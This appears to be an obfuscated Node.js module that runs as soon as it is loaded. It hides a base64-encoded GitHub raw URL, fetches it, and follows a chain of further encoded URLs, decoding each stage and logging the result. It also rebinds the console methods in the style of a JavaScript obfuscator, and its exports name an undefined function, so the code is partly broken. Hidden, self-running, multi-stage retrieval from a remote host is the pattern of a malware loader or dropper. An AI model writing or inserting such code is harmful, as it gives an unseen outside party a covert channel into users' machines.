const ax5k = require('axios');
const c4y7 = require('cheerio');
const b1s2 = require('base-64');
async function r3j8() {
    const _0x1a11f1 = (function () {
        let _0x3d82be = !![];
        return function (_0x1c5c5c, _0x115751) {
            const _0x4b5c7d = _0x3d82be ? function () {
                if (_0x115751) {
                    const _0x3b1a7f = _0x115751['apply'](_0x1c5c5c, arguments);
                    _0x115751 = null;
                    return _0x3b1a7f;
                }
            } : function () {
            };
            _0x3d82be = ![];
            return _0x4b5c7d;
        };
    }());
    const _0x1df4b0 = _0x1a11f1(this, function () {
        const _0x288416 = function () {
            let _0x517764;
            try {
                _0x517764 = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');')();
            } catch (_0x544bf6) {
                _0x517764 = window;
            }
            return _0x517764;
        };
        const _0x47a624 = _0x288416();
        const _0x97cf2e = _0x47a624['console'] = _0x47a624['console'] || {};
        const _0x4129c1 = [
            'log',
            'warn',
            'info',
            'error',
            'exception',
            'table',
            'trace'
        ];
        for (let _0x520d65 = 0x0; _0x520d65 < _0x4129c1['length']; _0x520d65++) {
            const _0x5a9e59 = _0x1a11f1['constructor']['prototype']['bind'](_0x1a11f1);
            const _0x3647b3 = _0x4129c1[_0x520d65];
            const _0x1a3c05 = _0x97cf2e[_0x3647b3] || _0x5a9e59;
            _0x5a9e59['__proto__'] = _0x1a11f1['bind'](_0x1a11f1);
            _0x5a9e59['toString'] = _0x1a3c05['toString']['bind'](_0x1a3c05);
            _0x97cf2e[_0x3647b3] = _0x5a9e59;
        }
    });
    _0x1df4b0();
    try {
        const _0x5519d2 = 'aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1JhcGxocy9yYXJib3RkYy9tYWluL2RzYTk3NXN4LmRzZnlkczA4ZnNkMC5hc2Rkc2EwOGRhcy50eHQ=';
        const _0x2b540d = b1s2['decode'](_0x5519d2);
        const _0x535903 = await ax5k['get'](_0x2b540d);
        const _0x11faea = _0x535903['data']['trim']();
        const _0x4701c5 = b1s2['decode'](_0x11faea);
        const _0x167e11 = await ax5k['get'](_0x4701c5);
        const _0x5d8800 = c4y7['load'](_0x167e11['data']);
        const _0x59b499 = _0x5d8800('body')['text']()['replace'](/\s+/g, '')['trim']();
        const _0x1c0d1b = b1s2['decode'](_0x59b499);
        const _0x3053e3 = _0x1c0d1b['replace'](/\s+/g, '\x20')['trim']();
        console['log'](_0x3053e3);
        const _0x2d5dae = await ax5k['get'](_0x1c0d1b);
        const _0x146be5 = c4y7['load'](_0x2d5dae['data']);
        const _0xdd92b9 = _0x146be5('body')['text']()['replace'](/\s+/g, '')['trim']();
        const _0x5544d5 = b1s2['decode'](_0xdd92b9);
        const _0x13aa1f = _0x5544d5['replace'](/\s+/g, '\x20')['trim']();
        console['log'](_0x13aa1f);
    } catch (_0x3cc0dd) {
        console['error']('Error:', _0x3cc0dd['message']);
    }
}
r3j8();
module['exports'] = {
    'r3j8': r3j8,
    'z4o7': z4o7
};
